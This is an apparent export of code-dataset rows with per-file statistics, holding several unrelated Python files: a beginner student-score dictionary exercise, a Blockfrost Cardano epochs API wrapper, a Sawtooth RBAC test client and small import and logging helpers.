p_adjust() | 55.873016 | 118 | 0.618466 | 527 | 3,520 | 3.912713 | 0.102467 | 0.069835 | 0.046557 | 0.075655 | 0.892338 | 0.892338 | 0.892338 | 0.878758 | 0.878758 | 0.869059 | 0 | 0.046032 | 0.173011 | 3,520 | 63 | 119 | 55.873016 | 0.662315 | 0.046875 | 0 | 0.647059 | 0 | 0 | 0.393639 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 1 | 0.019608 | false | 0 | 0 | 0 | 0.019608 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d7c99ad632e2351980cb5e68c6371fda3b9176a0 | 40 | py | Python | henmedlib/i_o/__init__.py | schmitzhenninglmu/henmedlib | 196b63710f092470ab21173cfcc0b14e65778f33 | [
"MIT"
] | null | null | null | henmedlib/i_o/__init__.py | schmitzhenninglmu/henmedlib | 196b63710f092470ab21173cfcc0b14e65778f33 | [
"MIT"
] | null | null | null | henmedlib/i_o/__init__.py | schmitzhenninglmu/henmedlib | 196b63710f092470ab21173cfcc0b14e65778f33 | [
"MIT"
] | 1 | 2019-09-20T10:59:25.000Z | 2019-09-20T10:59:25.000Z | from .dicom import *
from .mha import *
| 13.333333 | 20 | 0.7 | 6 | 40 | 4.666667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 40 | 2 | 21 | 20 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d7ced5431bbfb81862e550056f6763f5c3529b7f | 3,611 | py | Python | Dictionaries/Dictionaries21.py | liyuanyuan11/Python | d94cc7ab39e56c6e24bfc741a30da77590d1d220 | [
"MIT"
] | null | null | null | Dictionaries/Dictionaries21.py | liyuanyuan11/Python | d94cc7ab39e56c6e24bfc741a30da77590d1d220 | [
"MIT"
] | null | null | null | Dictionaries/Dictionaries21.py | liyuanyuan11/Python | d94cc7ab39e56c6e24bfc741a30da77590d1d220 | [
"MIT"
] | null | null | null | studentList=[]
student={}
student={"name":"李若瑜","ID":"1","score1":95,"score2":100,"score3":96,"total":291}
studentList.append(student)
student={"name":"张子栋","ID":"2","score1":93,"score2":100,"score3":95,"total":288}
studentList.append(student)
student={"name":"王小明","ID":"3","score1":100,"score2":94,"score3":100,"total":294}
studentList.append(student)
print("现在已经有"+str(len(studentList))+"位同学的成绩,他们的得分入下:")
print("学号 姓名 语文 数学 英语 总分")
print(studentList[0].get("ID")," ",studentList[0].get("name")," ",studentList[0].get("score1")," ",studentList[0].get("score2")," ",studentList[0].get("score3")," ",studentList[0].get("total"))
print(studentList[1].get("ID")," ",studentList[1].get("name")," ",studentList[1].get("score1")," ",studentList[1].get("score2")," ",studentList[1].get("score3")," ",studentList[1].get("total"))
print(studentList[2].get("ID")," ",studentList[2].get("name")," ",studentList[2].get("score1")," ",studentList[2].get("score2")," ",studentList[2].get("score3")," ",studentList[2].get("total"))
studentList[1]["score2"]=98
studentList[1]["total"]=studentList[1]["score1"]+studentList[1]["score2"]+studentList[1]["score3"]
print("第2位同学的语文成绩录入有误,要改为98分")
print("第2位同学修改后的成绩如下")
print("学号 姓名 语文 数学 英语 总分")
print(studentList[1].get("ID")," ",studentList[1].get("name")," ",studentList[1].get("score1")," ",studentList[1].get("score2")," ",studentList[1].get("score3")," ",studentList[1].get("total"))
print("接下来要录入一位新同学的成绩")
student={}
student["name"]=input("请输入学生姓名:")
student["ID"]=input("请输入学生学号:")
student["score1"]=input("请输入学生语文成绩:")
student["score2"]=input("请输入学生数学成绩:")
student["score3"]=input("请输入学生英语成绩:")
student["total"]=float(student["score1"])+float(student["score2"])+float(student["score3"])
studentList.append(student)
print("现在已经有"+str(len(studentList))+"位同学的成绩,他们的得分入下:")
print("学号 姓名 语文 数学 英语 总分")
print(studentList[0].get("ID")," ",studentList[0].get("name")," ",studentList[0].get("score1")," ",studentList[0].get("score2")," ",studentList[0].get("score3")," ",studentList[0].get("total"))
print(studentList[1].get("ID")," ",studentList[1].get("name")," ",studentList[1].get("score1")," ",studentList[1].get("score2")," ",studentList[1].get("score3")," ",studentList[1].get("total"))
print(studentList[2].get("ID")," ",studentList[2].get("name")," ",studentList[2].get("score1")," ",studentList[2].get("score2")," ",studentList[2].get("score3")," ",studentList[2].get("total"))
print(studentList[3].get("ID")," ",studentList[3].get("name")," ",studentList[3].get("score1")," ",studentList[3].get("score2")," ",studentList[3].get("score3")," ",studentList[3].get("total"))
studentList.sort(key=lambda x:x["total"])
print("按照总分由低到高排列学生信息")
print("现在已经有"+str(len(studentList))+"位同学的成绩,他们的得分入下:")
print("学号 姓名 语文 数学 英语 总分")
print(studentList[0].get("ID")," ",studentList[0].get("name")," ",studentList[0].get("score1")," ",studentList[0].get("score2")," ",studentList[0].get("score3")," ",studentList[0].get("total"))
print(studentList[1].get("ID")," ",studentList[1].get("name")," ",studentList[1].get("score1")," ",studentList[1].get("score2")," ",studentList[1].get("score3")," ",studentList[1].get("total"))
print(studentList[2].get("ID")," ",studentList[2].get("name")," ",studentList[2].get("score1")," ",studentList[2].get("score2")," ",studentList[2].get("score3")," ",studentList[2].get("total"))
print(studentList[3].get("ID")," ",studentList[3].get("name")," ",studentList[3].get("score1")," ",studentList[3].get("score2")," ",studentList[3].get("score3")," ",studentList[3].get("total"))
studentList.sort(key=lambda x:x["total"],reverse=True) | 83.976744 | 193 | 0.660205 | 475 | 3,611 | 5.018947 | 0.117895 | 0.145973 | 0.151007 | 0.080537 | 0.780621 | 0.751258 | 0.751258 | 0.751258 | 0.751258 | 0.744128 | 0 | 0.049611 | 0.039878 | 3,611 | 43 | 194 | 83.976744 | 0.638016 | 0 | 0 | 0.581395 | 0 | 0 | 0.23505 | 0.005814 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.534884 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
d7eac4ee74804326282aa33abb850a6a93181837 | 9,063 | py | Python | blockfrost/api/cardano/epochs.py | AstroWa3l/blockfrost-python | dd3661ee3b882cc2081292327adbbf2d61fda0f9 | [
"Apache-2.0"
] | 1 | 2021-12-13T22:28:45.000Z | 2021-12-13T22:28:45.000Z | blockfrost/api/cardano/epochs.py | AstroWa3l/blockfrost-python | dd3661ee3b882cc2081292327adbbf2d61fda0f9 | [
"Apache-2.0"
] | null | null | null | blockfrost/api/cardano/epochs.py | AstroWa3l/blockfrost-python | dd3661ee3b882cc2081292327adbbf2d61fda0f9 | [
"Apache-2.0"
] | null | null | null | import requests
from dataclasses import dataclass, field
from blockfrost.utils import request_wrapper, list_request_wrapper
@request_wrapper
def epoch_latest(self, **kwargs):
"""
Return the information about the latest, therefore current, epoch.
https://docs.blockfrost.io/#tag/Cardano-Epochs/paths/~1epochs~1latest/get
:param return_type: Optional. "object", "json" or "pandas". Default: "object".
:type return_type: str
:returns object.
:rtype: Namespace
:raises ApiError: If API fails
:raises Exception: If the API response is somehow malformed.
"""
return requests.get(
url=f"{self.url}/epochs/latest",
headers=self.default_headers
)
@request_wrapper
def epoch_latest_parameters(self, **kwargs):
"""
Return the protocol parameters for the latest epoch.
https://docs.blockfrost.io/#tag/Cardano-Epochs/paths/~1epochs~1latest~1parameters/get
:param return_type: Optional. "object", "json" or "pandas". Default: "object".
:type return_type: str
:returns object.
:rtype: Namespace
:raises ApiError: If API fails
:raises Exception: If the API response is somehow malformed.
"""
return requests.get(
url=f"{self.url}/epochs/latest/parameters",
headers=self.default_headers
)
@request_wrapper
def epoch(self, number: int, **kwargs):
"""
Return the content of the requested epoch.
https://docs.blockfrost.io/#tag/Cardano-Epochs/paths/~1epochs~1{number}/get
:param number: Number of the epoch.
:type number: int
:param return_type: Optional. "object", "json" or "pandas". Default: "object".
:type return_type: str
:returns object.
:rtype: Namespace
:raises ApiError: If API fails
:raises Exception: If the API response is somehow malformed.
"""
return requests.get(
url=f"{self.url}/epochs/{number}",
headers=self.default_headers
)
@list_request_wrapper
def epochs_next(self, number: int, **kwargs):
"""
Return the list of epochs following a specific epoch.
https://docs.blockfrost.io/#tag/Cardano-Epochs/paths/~1epochs~1{number}~1next/get
:param number: Number of the epoch.
:type number: int
:param return_type: Optional. "object", "json" or "pandas". Default: "object".
:type return_type: str
:param gather_pages: Optional. Default: false. Will collect all pages into one return
:type gather_pages: bool
:param count: Optional. Default: 100. The number of results displayed on one page.
:type count: int
:param page: Optional. The page number for listing the results.
:type page: int
:returns A list of objects.
:rtype [Namespace]
:raises ApiError: If API fails
:raises Exception: If the API response is somehow malformed.
"""
return requests.get(
url=f"{self.url}/epochs/{number}/next",
params=self.query_parameters(kwargs),
headers=self.default_headers
)
@list_request_wrapper
def epochs_previous(self, number: int, **kwargs):
"""
Return the list of epochs preceding a specific epoch.
https://docs.blockfrost.io/#tag/Cardano-Epochs/paths/~1epochs~1{number}~1previous/get
:param number: Number of the epoch.
:type number: int
:param return_type: Optional. "object", "json" or "pandas". Default: "object".
:type return_type: str
:param gather_pages: Optional. Default: false. Will collect all pages into one return
:type gather_pages: bool
:param count: Optional. Default: 100. The number of results displayed on one page.
:type count: int
:param page: Optional. The page number for listing the results.
:type page: int
:returns A list of objects.
:rtype [Namespace]
:raises ApiError: If API fails
:raises Exception: If the API response is somehow malformed.
"""
return requests.get(
url=f"{self.url}/epochs/{number}/previous",
params=self.query_parameters(kwargs),
headers=self.default_headers
)
@list_request_wrapper
def epoch_stakes(self, number: int, **kwargs):
"""
Return the active stake distribution for the specified epoch.
https://docs.blockfrost.io/#tag/Cardano-Epochs/paths/~1epochs~1{number}~1stakes/get
:param number: Number of the epoch.
:type number: int
:param return_type: Optional. "object", "json" or "pandas". Default: "object".
:type return_type: str
:param gather_pages: Optional. Default: false. Will collect all pages into one return
:type gather_pages: bool
:param count: Optional. Default: 100. The number of results displayed on one page.
:type count: int
:param page: Optional. The page number for listing the results.
:type page: int
:returns A list of objects.
:rtype [Namespace]
:raises ApiError: If API fails
:raises Exception: If the API response is somehow malformed.
"""
return requests.get(
url=f"{self.url}/epochs/{number}/stakes",
params=self.query_parameters(kwargs),
headers=self.default_headers
)
@list_request_wrapper
def epoch_pool_stakes(self, number: int, pool_id: str, **kwargs):
"""
Return the active stake distribution for the epoch specified by stake pool.
https://docs.blockfrost.io/#tag/Cardano-Epochs/paths/~1epochs~1{number}~1stakes~1{pool_id}/get
:param number: Number of the epoch.
:type number: int
:param pool_id: Stake pool ID to filter.
:type pool_id: int
:param return_type: Optional. "object", "json" or "pandas". Default: "object".
:type return_type: str
:param gather_pages: Optional. Default: false. Will collect all pages into one return
:type gather_pages: bool
:param count: Optional. Default: 100. The number of results displayed on one page.
:type count: int
:param page: Optional. The page number for listing the results.
:type page: int
:returns A list of objects.
:rtype [Namespace]
:raises ApiError: If API fails
:raises Exception: If the API response is somehow malformed.
"""
return requests.get(
url=f"{self.url}/epochs/{number}/stakes/{pool_id}",
params=self.query_parameters(kwargs),
headers=self.default_headers
)
@list_request_wrapper
def epoch_blocks(self, number: int, **kwargs):
"""
Return the blocks minted for the epoch specified.
https://docs.blockfrost.io/#tag/Cardano-Epochs/paths/~1epochs~1{number}~1blocks/get
:param number: Number of the epoch.
:type number: int
:param gather_pages: Optional. Default: false. Will collect all pages into one return
:type gather_pages: bool
:param count: Optional. Default: 100. The number of results displayed on one page.
:type count: int
:param page: Optional. The page number for listing the results.
:type page: int
:param order: Optional. "asc" or "desc". Default: "asc".
:type order: str
:returns A list of str objects.
:rtype [str]
:raises ApiError: If API fails
:raises Exception: If the API response is somehow malformed.
"""
return requests.get(
url=f"{self.url}/epochs/{number}/blocks",
params=self.query_parameters(kwargs),
headers=self.default_headers
)
@list_request_wrapper
def epoch_pool_blocks(self, number: int, pool_id: str, **kwargs):
"""
Return the block minted for the epoch specified by stake pool.
https://docs.blockfrost.io/#tag/Cardano-Epochs/paths/~1epochs~1{number}~1blocks~1{pool_id}/get
:param number: Number of the epoch.
:type number: int
:param pool_id: Stake pool ID to filter.
:type pool_id: int
:param gather_pages: Optional. Default: false. Will collect all pages into one return
:type gather_pages: bool
:param count: Optional. Default: 100. The number of results displayed on one page.
:type count: int
:param page: Optional. The page number for listing the results.
:type page: int
:param order: Optional. "asc" or "desc". Default: "asc".
:type order: str
:returns A list of str objects.
:rtype [str]
:raises ApiError: If API fails
:raises Exception: If the API response is somehow malformed.
"""
return requests.get(
url=f"{self.url}/epochs/{number}/blocks/{pool_id}",
params=self.query_parameters(kwargs),
headers=self.default_headers
)
@request_wrapper
def epoch_protocol_parameters(self, number: int, **kwargs):
"""
Return the protocol parameters for the epoch specified.
https://docs.blockfrost.io/#tag/Cardano-Epochs/paths/~1epochs~1{number}~1parameters/get
:param number: Number of the epoch.
:type number: int
:param return_type: Optional. "object", "json" or "pandas". Default: "object".
:type return_type: str
:returns object.
:rtype: Namespace
:raises ApiError: If API fails
:raises Exception: If the API response is somehow malformed.
"""
return requests.get(
url=f"{self.url}/epochs/{number}/parameters",
headers=self.default_headers
)
| 34.071429 | 98 | 0.686086 | 1,217 | 9,063 | 5.03862 | 0.09203 | 0.035877 | 0.027723 | 0.034247 | 0.943412 | 0.928571 | 0.915199 | 0.903457 | 0.873614 | 0.839041 | 0 | 0.006677 | 0.206775 | 9,063 | 265 | 99 | 34.2 | 0.846293 | 0.667218 | 0 | 0.521739 | 0 | 0 | 0.144007 | 0.144007 | 0 | 0 | 0 | 0 | 0 | 1 | 0.144928 | false | 0 | 0.043478 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d7ed15754e3e14ef5abed64decd85507892618df | 14,403 | py | Python | tests/blockchain/rbac_client.py | knagware9/sawtooth-next-directory | be80852e08d2b27e105d964c727509f2a974002d | [
"Apache-2.0"
] | 1 | 2019-04-14T20:16:59.000Z | 2019-04-14T20:16:59.000Z | tests/blockchain/rbac_client.py | crazyrex/sawtooth-next-directory | 210b581c8c92c307fab2f6d2b9a55526b56b790a | [
"Apache-2.0"
] | null | null | null | tests/blockchain/rbac_client.py | crazyrex/sawtooth-next-directory | 210b581c8c92c307fab2f6d2b9a55526b56b790a | [
"Apache-2.0"
] | 1 | 2018-12-07T10:55:08.000Z | 2018-12-07T10:55:08.000Z | # Copyright 2018 Contributors to Hyperledger Sawtooth
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
from base64 import b64decode
from uuid import uuid4
from rbac.common import addresser
from rbac.common.protobuf import user_state_pb2
from rbac.transaction_creation.user_transaction_creation import create_user
from rbac.transaction_creation import (
task_transaction_creation,
role_transaction_creation,
manager_transaction_creation,
)
from rbac.common.sawtooth.rest_client import RestClient
REST_ENDPOINT = "http://rest-api:8008"
class RbacClient(object):
def __init__(self, url, key):
if url is None:
url = REST_ENDPOINT
self._client = RestClient(base_url=url)
self._key = key
def return_state(self):
items = []
for item in self._client.list_state(subtree=addresser.NAMESPACE)["data"]:
if addresser.address_is(item["address"]) == addresser.AddressSpace.USER:
user_container = user_state_pb2.UserContainer()
user_container.ParseFromString(b64decode(item["data"]))
items.append((user_container, addresser.AddressSpace.USER))
return items
def create_user(self, key, name, user_name, user_id, manager_id=None):
batch_list, signature = create_user(
txn_key=key,
batch_key=self._key,
name=name,
user_name=user_name,
user_id=user_id,
metadata=uuid4().hex,
manager_id=manager_id,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def create_role(self, key, role_name, role_id, metadata, admins, owners):
batch_list, signature = role_transaction_creation.create_role(
txn_key=key,
batch_key=self._key,
role_name=role_name,
role_id=role_id,
metadata=metadata,
admins=admins,
owners=owners,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_update_manager(
self, key, proposal_id, user_id, new_manager_id, reason, metadata
):
batch_list, signature = manager_transaction_creation.propose_manager(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
user_id=user_id,
new_manager_id=new_manager_id,
reason=reason,
metadata=metadata,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_update_manager(self, key, proposal_id, reason, user_id, manager_id):
batch_list, signature = manager_transaction_creation.confirm_manager(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
reason=reason,
user_id=user_id,
manager_id=manager_id,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_update_manager(self, key, proposal_id, reason, user_id, manager_id):
batch_list, signature = manager_transaction_creation.reject_manager(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
reason=reason,
user_id=user_id,
manager_id=manager_id,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_role_admins(
self, key, proposal_id, role_id, user_id, reason, metadata
):
batch_list, signature = role_transaction_creation.propose_add_role_admins(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
metadata=metadata,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_role_admins(self, key, proposal_id, role_id, user_id, reason):
batch_list, signature = role_transaction_creation.confirm_add_role_admins(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_role_admins(self, key, proposal_id, role_id, user_id, reason):
batch_list, signature = role_transaction_creation.reject_add_role_admins(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_role_owners(
self, key, proposal_id, role_id, user_id, reason, metadata
):
batch_list, signature = role_transaction_creation.propose_add_role_owners(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
metadata=metadata,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_role_owners(self, key, proposal_id, role_id, user_id, reason):
batch_list, signature = role_transaction_creation.confirm_add_role_owners(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_role_owners(self, key, proposal_id, role_id, user_id, reason):
batch_list, signature = role_transaction_creation.reject_add_role_owners(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_role_members(
self, key, proposal_id, role_id, user_id, reason, metadata
):
batch_list, signature = role_transaction_creation.propose_add_role_members(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
metadata=metadata,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_role_members(self, key, proposal_id, role_id, user_id, reason):
batch_list, signature = role_transaction_creation.confirm_add_role_members(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_role_members(self, key, proposal_id, role_id, user_id, reason):
batch_list, signature = role_transaction_creation.reject_add_role_members(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_role_tasks(
self, key, proposal_id, role_id, task_id, reason, metadata
):
batch_list, signature = role_transaction_creation.propose_add_role_tasks(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
task_id=task_id,
reason=reason,
metadata=metadata,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_role_tasks(self, key, proposal_id, role_id, task_id, reason):
batch_list, signature = role_transaction_creation.confirm_add_role_tasks(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
task_id=task_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_role_tasks(self, key, proposal_id, role_id, task_id, reason):
batch_list, signature = role_transaction_creation.reject_add_role_tasks(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
task_id=task_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def create_task(self, key, task_id, task_name, admins, owners, metadata):
batch_list, signature = task_transaction_creation.create_task(
txn_key=key,
batch_key=self._key,
task_id=task_id,
task_name=task_name,
admins=admins,
owners=owners,
metadata=metadata,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_task_admins(
self, key, proposal_id, task_id, user_id, reason, metadata
):
batch_list, signature = task_transaction_creation.propose_add_task_admins(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
metadata=metadata,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_task_admins(self, key, proposal_id, task_id, user_id, reason):
batch_list, signature = task_transaction_creation.confirm_add_task_admins(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_task_admins(self, key, proposal_id, task_id, user_id, reason):
batch_list, signature = task_transaction_creation.reject_add_task_admins(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_task_owners(
self, key, proposal_id, task_id, user_id, reason, metadata
):
batch_list, signature = task_transaction_creation.propose_add_task_owner(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
metadata=metadata,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_task_owners(self, key, proposal_id, task_id, user_id, reason):
batch_list, signature = task_transaction_creation.confirm_add_task_owners(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_task_owners(self, key, proposal_id, task_id, user_id, reason):
batch_list, signature = task_transaction_creation.reject_add_task_owners(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_delete_task_admins(
self, key, proposal_id, task_id, user_id, reason, metadata
):
batch_list, signature = task_transaction_creation.propose_remove_task_admins(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
metadata=metadata,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_delete_task_owners(
self, key, proposal_id, task_id, user_id, reason, metadata
):
batch_list, signature = task_transaction_creation.propose_remove_task_owners(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
metadata=metadata,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
| 36.279597 | 85 | 0.634729 | 1,765 | 14,403 | 4.793201 | 0.079887 | 0.08156 | 0.053901 | 0.092435 | 0.824113 | 0.811348 | 0.791608 | 0.777305 | 0.777305 | 0.777305 | 0 | 0.007135 | 0.279872 | 14,403 | 396 | 86 | 36.371212 | 0.808523 | 0.045199 | 0 | 0.672515 | 0 | 0 | 0.002548 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081871 | false | 0 | 0.020468 | 0 | 0.184211 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
cc143f2a232ecdca77df295342ee14db0d1f3315 | 137 | py | Python | annasys/console/success.py | apoulakos/python-console | 1506a1f24eb6cacd585479eef93268af5f29a4a3 | [
"MIT"
] | 1 | 2019-03-17T22:51:45.000Z | 2019-03-17T22:51:45.000Z | annasys/console/success.py | apoulakos/python-console | 1506a1f24eb6cacd585479eef93268af5f29a4a3 | [
"MIT"
] | null | null | null | annasys/console/success.py | apoulakos/python-console | 1506a1f24eb6cacd585479eef93268af5f29a4a3 | [
"MIT"
] | null | null | null | from .log import log
def success(message):
log('SUCCESS', message, fg='green', bold=True, color_status=True, include_brackets=True)
| 27.4 | 92 | 0.737226 | 20 | 137 | 4.95 | 0.7 | 0.282828 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.124088 | 137 | 4 | 93 | 34.25 | 0.825 | 0 | 0 | 0 | 0 | 0 | 0.087591 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0401e87d3ec083aaf907ca099e0d5d753b6f5f75 | 169 | py | Python | python/smallest.py | TechieHelper/Codewars | 98ea8deb14ae1422162895f481e4175ab5868955 | [
"MIT"
] | null | null | null | python/smallest.py | TechieHelper/Codewars | 98ea8deb14ae1422162895f481e4175ab5868955 | [
"MIT"
] | null | null | null | python/smallest.py | TechieHelper/Codewars | 98ea8deb14ae1422162895f481e4175ab5868955 | [
"MIT"
] | null | null | null | # def smallest(n):
# for i in range(len(str(n))):
# for j in range(len(str(n))):
# tempN = n
# if str(n).
#
# print(smallest(261235)) | 24.142857 | 38 | 0.467456 | 25 | 169 | 3.16 | 0.56 | 0.151899 | 0.253165 | 0.329114 | 0.35443 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054054 | 0.343195 | 169 | 7 | 39 | 24.142857 | 0.657658 | 0.91716 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
040eaf851182bf607bae04d8ae394e4ca0c90427 | 21 | py | Python | ndview/__init__.py | danionella/ndview | d1003113e352a4a9b29a0b078df0d21f1514d877 | [
"MIT"
] | 2 | 2020-11-16T10:33:08.000Z | 2022-01-06T08:20:41.000Z | ndview/__init__.py | danionella/ndview | d1003113e352a4a9b29a0b078df0d21f1514d877 | [
"MIT"
] | null | null | null | ndview/__init__.py | danionella/ndview | d1003113e352a4a9b29a0b078df0d21f1514d877 | [
"MIT"
] | null | null | null | from .core import ndv | 21 | 21 | 0.809524 | 4 | 21 | 4.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 21 | 1 | 21 | 21 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
